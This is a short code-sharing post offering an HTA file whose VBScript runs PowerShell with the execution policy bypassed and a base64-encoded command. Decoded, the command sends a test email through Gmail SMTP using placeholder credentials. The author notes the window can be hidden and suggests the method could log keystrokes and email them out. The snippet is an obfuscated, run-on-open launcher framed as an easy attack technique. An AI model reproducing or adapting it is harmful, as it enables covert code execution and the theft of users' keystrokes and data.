HTA file

<!DOCTYPE html> <!-- saved from url=(0016)http://localhost --> <html> <head> </head> <body> </body> </html> <script language="VBScript" type="text/vbscript"> Set WshShell = CreateObject("WScript.Shell") WshShell.run("powershell.exe -ExecutionPolicy Bypass -noexit -EncodedCommand JABtAGEAaQBsAE0AZQBzAHMAYQBnAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ATQBhAGkAbAAuAE0AYQBpAGwATQBlAHMAcwBhAGcAZQBdADoAOgBuAGUAdwAoACIAZgByAG8AbQBAAGcAbQBhAGkAbAAuAGMAbwBtACIALAAgACIAdABvAEAAZwBtAGEAaQBsAC4AYwBvAG0AIgApACAADQAKACAAIAAgACAAIAAgACAAIAAkAG0AYQBpAGwATQBlAHMAcwBhAGcAZQAuAFMAdQBiAGoAZQBjAHQAIAA9ACAAIgBUAGUAcwB0ACAARQBtAGEAaQBsACAARgByAG8AbQAgAEgAVABBACIADQAKACAAIAAgACAAIAAgACAAIAAkAGMAbABpAGUAbgB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAE0AYQBpAGwALgBTAG0AdABwAEMAbABpAGUAbgB0AF0AOgA6AG4AZQB3ACgAIgBzAG0AdABwAC4AZwBtAGEAaQBsAC4AYwBvAG0AIgAsACAANQA4ADcAKQANAAoAIAAgACAAIAAgACAAIAAgACQAYwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbABdADoAOgBuAGUAdwAoACIAdQBzAGUAcgBuAGEAbQBlACIALAAgACIAdQBzAGUAcgBwAGEAcwBzAHcAbwByAGQAIgApAA0ACgAgACAAIAAgACAAIAAgACAAJABjAGwAaQBlAG4AdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIAAkAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwANAAoAIAAgACAAIAAgACAAIAAgACQAYwBsAGkAZQBuAHQALgBFAG4AYQBiAGwAZQBTAHMAbAAgAD0AIAAiAFQAcgB1AGUAIgANAAoAIAAgACAAIAAgACAAIAAgACQAYwBsAGkAZQBuAHQALgBIAG8AcwB0ACAAPQAgACIAcwBtAHQAcAAuAGcAbQBhAGkAbAAuAGMAbwBtACIADQAKACAAIAAgACAAIAAgACAAIAAkAGMAbABpAGUAbgB0AC4AUwBlAG4AZAAoACQAbQBhAGkAbABNAGUAcwBzAGEAZwBlACkA") </script>
This is how easy it is to execute a powershell script. I left the -noexit parameter on so you can see it run. However, easy to use the parameter to make the window not show at all.

With just this it shows how easy it would be to monitor keystrokes and then send emails to someone or essentially do whatever you want. This is crazy!

Be the first to comment

You can use [html][/html], [css][/css], [php][/php] and more to embed the code. Urls are automatically hyperlinked. Line breaks and paragraphs are automatically generated.